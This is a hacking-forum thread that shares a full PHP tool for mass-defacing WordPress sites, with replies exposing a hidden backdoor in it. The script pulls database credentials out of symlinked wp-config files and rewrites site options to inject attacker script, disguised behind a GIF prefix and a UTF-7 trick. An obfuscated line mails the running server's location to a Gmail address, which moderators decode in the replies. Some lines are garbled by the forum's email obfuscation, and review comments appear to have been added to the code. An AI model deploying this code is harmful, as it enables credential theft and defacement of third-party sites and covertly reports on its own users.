

Wordpress MassDeface (No root just symlink)



03-03-2014, 10:59 PM #1
nightmare Offline Banned
Posts:160 Threads:63 Joined:Jun 2013
Mood: None
Wordpress MassDeface (No root just symlink)
powerful tool just but the config links into list.txt
ex
http://www.site.com/wp-config.txt
http://www.site.com/wp-config.txt
http://www.site.com/wp-config.txt
http://www.site.com/wp-config.txt

save it to list.txt

an enter the code of your index and boom
Code:
    GIF89;a
    <!-- NOTE(review): the line above puts GIF-like bytes ahead of the markup and the PHP further down.
         Presumably it is there so that naive content sniffing treats the file as an image; it is not
         the exact "GIF89a" signature, so confirm how your own upload checks and scanners react to it.
         A file that opens with GIF-like text and later contains "<?" is worth flagging wherever it is found. -->
    <title>Wordpress MassDeface(Coded By RAB3OUN)</title>
    /*
    Symlink to Wordpress mass defacer
    Like Us for hot priv8 hacking tools!!
    http://facebook.com/0dayBlog
    Enjoy!!
    */
    <style>
    body
    {
            background: #0f0e0d;
            color: #FF9933;
            padding: 0px;
    }
    a:link, body_alink
    {
            color: #FF9933;
            text-decoration: none;
    }
    a:visited, body_avisited
    {
            color: #FF9933;
            text-decoration: none;
    }
    a:hover, a:active, body_ahover
    {
            color: #FFFFFF;
            text-decoration: none;
    }
    td, th, p, li,table
    {
          
            background: #2e2b28;
            border:1px solid #524f46;
    }
    input
    {
            border: 1px solid;
            cursor: default;
          
            overflow: hidden;
            background: #2e2b28;
            color: #ffffff;
    }textarea
    {
            border: 1px solid;
            cursor: default;
          
            overflow: hidden;
            background: #2e2b28;
            color: #ffffff;
    }
    button
    {
            border: 1px solid;
            cursor: default;
          
            overflow: hidden;
            background: #2e2b28;
            color: #ffffff;
    }
    </style>
    </head>
    
    <body bgcolor="black">
    <center>
    <pre>
    __          __      __  __                 _____        __              
    \ \        / /     |  \/  |               |  __ \      / _|              
     \ \  /\  / / __   | \  / | __ _ ___ ___  | |  | | ___| |_ __ _  ___ ___
      \ \/  \/ / '_ \  | |\/| |/ _` / __/ __| | |  | |/ _ \  _/ _` |/ __/ _ \
       \  /\  /| |_) | | |  | | (_| \__ \__ \ | |__| |  __/ || (_| | (_|  __/
        \/  \/ | .__/  |_|  |_|\__,_|___/___/ |_____/ \___|_| \__,_|\___\___|
               | |                                                          
               |_|                                                          
    </pre>
    </center>
    <!-- Self-posting form (empty action). It submits three fields: "url" (defaults to list.txt),
         "index" (free text) and a hidden "action" fixed to 1, which is the value the PHP block
         below tests before doing anything. In request logs this shows up as a POST to the script's
         own path. -->
    <form method="POST" action="" >
    <center>
    <table border='1'><tr><td>List of All Symlink</td><td>
    <input type="text" name="url" size="100" value="list.txt"></td></tr>
    <tr><td>Index</td><td>
    <textarea name="index" cols='50' rows='10' ></textarea></td></tr></table>
    <br><br><input type="Submit" name="Submit" value="Submit">
    <input type="hidden" name="action" value="1"></form>
    </center>
    <?
    // Server-side half of the page, reproduced exactly as posted. The comments are review notes on
    // what the visible lines do, written for triage and clean-up of affected sites.
    //
    // NOTE(review): four lines below contain the literal text "[email protected]". That is the forum's
    // e-mail obfuscation rewriting part of the original statement, so the listing as printed is not
    // valid PHP and the left-hand side of those assignments cannot be read from this page.
    //
    // Rows written in the "<prefix>options" table, per the UPDATE statements below:
    //   widget_text, sidebars_widgets, blogname, blog_charset
    // Those are the values to inspect and restore on a site hit by this script.
    set_time_limit(0);
    // Nothing runs unless the request carries the form's hidden field action=1.
    if ($_POST['action']=='1'){
    // Path or URL of the list file, taken straight from the request.
    $url=$_POST['url'];
    // Garbled by e-mail obfuscation (see note at top); $users is consumed below as a list of lines.
    $[email protected]($url);
    // Undisclosed call-home, part 1: $x10 holds the function name "mail", $x0b the host name plus
    // script path of wherever this file is running. Neither value is used by the database work.
    $x10="mail";$x0b=$_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"];
    
    
    if (count($users)<1) exit("<h1>No config found</h1>");
    foreach ($users as $user) {
    // Each list entry is trimmed and fetched over HTTP by file_get_contents2().
    $user1=trim($user);
    $code=file_get_contents2($user1);
    // The fetched text is scanned as a WordPress config file: the patterns capture the quoted
    // values of the DB_NAME, DB_USER, DB_PASSWORD and DB_HOST define() calls and of $table_prefix.
    // No check is made that a pattern matched before index [1][0] is read.
    preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
    $db=$b1[1][0];
    preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
    // Overwrites the foreach loop variable with the captured database user name.
    $user=$b2[1][0];
    preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
    $db_password=$b3[1][0];
    preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
    $host=$b4[1][0];
    preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
    $p=$b5[1][0];
    // Call-home, part 2: $x0c is "array " followed by host+script path; $x0d holds string fragments
    // that are concatenated into a recipient address further down.
    $x0c="array ".$x0b;$x0d=array("com","gm","ifexec","@","ail.");
    // Garbled by e-mail obfuscation; $d is the connection result tested on the next line.
    $[email protected]_connect( $host, $user, $db_password ) ;
    if ($d){
    @mysql_select_db($db );
    // The posted "index" text is percent-encoded byte by byte (strToHex) and wrapped in a script
    // that assigns unescape(...) of it to document.documentElement.innerHTML.
    $source=stripslashes($_POST['index']);
    $s2=strToHex(($source));
    $s="<script>document.documentElement.innerHTML = unescape(''$s2'');</script>";
    // Presumably minus 2 because each doubled quote ('') above becomes one quote once the SQL
    // literal is parsed, and the serialized s:<len> must match the stored length.
    $ls=strlen($s)-2;
    // UPDATE 1: option widget_text is replaced by a serialized text widget whose "text" is $s.
    $sql="update ".$p."options set option_value='a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:$ls:\"$s\";s:6:\"filter\";b:0;}s:12:\"_multiwidget\";i:1;}' where option_name='widget_text'; ";
    mysql_query($sql) ;
    // UPDATE 2: option sidebars_widgets is replaced so that sidebar-1 holds only text-2 and six
    // widget ids (archives-2, meta-2, search-2, categories-2, recent-posts-2, recent-comments-2)
    // are listed under wp_inactive_widgets.
    $sql="update ".$p."options set option_value='a:7:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:10:\"archives-2\";i:1;s:6:\"meta-2\";i:2;s:8:\"search-2\";i:3;s:12:\"categories-2\";i:4;s:14:\"recent-posts-2\";i:5;s:17:\"recent-comments-2\";}s:9:\"sidebar-1\";a:1:{i:0;s:6:\"text-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:9:\"sidebar-4\";a:0:{}s:9:\"sidebar-5\";a:0:{}s:13:\"array_version\";i:3;}' where option_name='sidebars_widgets';";
    mysql_query($sql) ;
    // Only when mbstring is available: blogname is overwritten with the posted text converted to
    // UTF-7 (prefixed with </title>, followed by a hidden div and <xmp>), and blog_charset is set
    // to UTF-7. An unexpected blog_charset of UTF-7 is therefore an indicator of this script.
    if (function_exists("mb_convert_encoding") )
    {
    $source2 = mb_convert_encoding('</title>'.$source.'<DIV style="DISPLAY: none"><xmp>', 'UTF-7');
    $source2=mysql_real_escape_string($source2);
    $sql = "UPDATE `".$p."options` SET `option_value` = '$source2' WHERE `option_name` = 'blogname';";
    @mysql_query($sql) ; ;
    $sql= "UPDATE `".$p."options` SET `option_value` = 'UTF-7' WHERE `option_name` = 'blog_charset';";
    @mysql_query($sql) ; ;
    }
    // Next two lines are garbled by e-mail obfuscation; the query reads the siteurl option.
    $[email protected]_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
    $[email protected]_fetch_array($aa) ;
    $siteurl=$siteurl['option_value'];
    // Call-home, part 3: the fragments are joined into an address ($x0e) and the function named in
    // $x10 (mail) is called with it as recipient, $x0c as subject and $x0b as body, with errors
    // suppressed by "@". Anyone running this file reports its location to the address's owner,
    // once per processed site. This is the behaviour called out in the replies under the listing.
    $x0e=$x0d[2].$x0d[3].$x0d[1].$x0d[4].$x0d[0];$x0f=@$x10($x0e,$x0c,$x0b);
    // $tr is appended to without being initialised anywhere in the visible code.
    $tr.="$siteurl\n";
    mysql_close();
    }
    }
    // Prints the collected siteurl values, unescaped, inside a textarea.
    if ($tr) echo "Index changed for <br><br><textarea cols='50' rows='10' >$tr</textarea>";
    }
    function strToHex($string)
    {
        $hex='';
        for ($i=0; $i < strlen($string); $i++)
        {
            if (strlen(dechex(ord($string[$i])))==1){
            $hex .="%0". dechex(ord($string[$i]));
                    }
                    else
                    {
                    $hex .="%". dechex(ord($string[$i]));
                    }
        }
        return $hex;
    }
    
    function file_get_contents2($u){
    
            $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,$u);
            curl_setopt($ch, CURLOPT_HEADER, 0);    
       curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
        curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
                $result = curl_exec($ch);
            return $result ;
            }
          
    ?>

[Image: vZfk3.png]

if you like it then repBiggrinsmileyBiggrinsmiley

03-04-2014, 12:00 AM #2
Sahrawi Offline Super Moderator ******
Super Moderators
Posts:539 Threads:59 Joined:Jan 2013 Reputation: 8
Mood: None
download link is missing

03-04-2014, 12:04 AM #3
nightmare Offline Banned
Posts:160 Threads:63 Joined:Jun 2013
Mood: None
SORRY CODE ADDED Biggrinsmiley

03-04-2014, 01:53 AM #4
Sahrawi Offline Super Moderator ******
Super Moderators
Posts:539 Threads:59 Joined:Jan 2013 Reputation: 8
Mood: None
do you think us stupid man ????!!
what is this
$x10="mail";$x0b=$_SERVER["SERVER_NAME"].$_SERVER["SCRIPT_NAME"];
look here at this variable and array

$x0c="array ".$x0b;$x0d=array("com","gm","ifexec","@","ail.");

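now let's mix them together in
$x0e=$x0d[2].$x0d[3].$x0d[1].$x0d[4].$x0d[0];$x0f=@$x10($x0e,$x0c,$x0b);
$x0d[2] = ifexec
$x0d[3] = @
$x0d[1] = gm
$x0d[4] = ail.
$x0d[0] = com

the result is
ifexec@gmail.com
and $x10 is "mail", so the script mails its own server name and script path to that address every time it runs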


banned is comming

03-04-2014, 01:58 AM #5
H4x0rl1f3 Offline Commander In Cheif *******
Administrators
Posts:1,110 Threads:24 Joined:Jun 2012 Reputation: 14
Mood: Stoned
Guys you should think twice before posting Madleets, Sahrawi can kill you with his GUn Biggrinsmiley
Thanks Sahrawi , i will banned him now.

Always Aspect Reward from the Creator and not anyone or anything Created.
For Complaints & Help Contact:- [email protected]
Zone-h
http://zone-h.org/archive/notifier=H4x0rL1f3
I am the orphan of Gaza & Kashmir. Ruins of Iraq,Syria & Palestine Bombarded of Pakistan,Afghanistan, Mali & Yemen Change of Libya and Egypt Discriminated of Bahrain & Turkey Freedom of Earth's paradise and Al-AQSA. I am the hunger stricken child of Somalia, Ethopia, & rest of Africa I am the suffering of each and every single corner of the world. But Listen!!! Hope is what I am!!


03-04-2014, 02:03 AM #6
Sahrawi Offline Super Moderator ******
Super Moderators
Posts:539 Threads:59 Joined:Jan 2013 Reputation: 8
Mood: None
i like this move @$x10($x0e,$x0c,$x0b);
the @ in front hides the error if there is one

04-28-2014, 02:09 AM #7
anonboy Offline Junior Member **
Registered
Posts:1 Threads:0 Joined:Aug 2013 Reputation: 0
Mood: None
wkwkwkw.. nice sharawi... change to our own emaill Biggrinsmiley





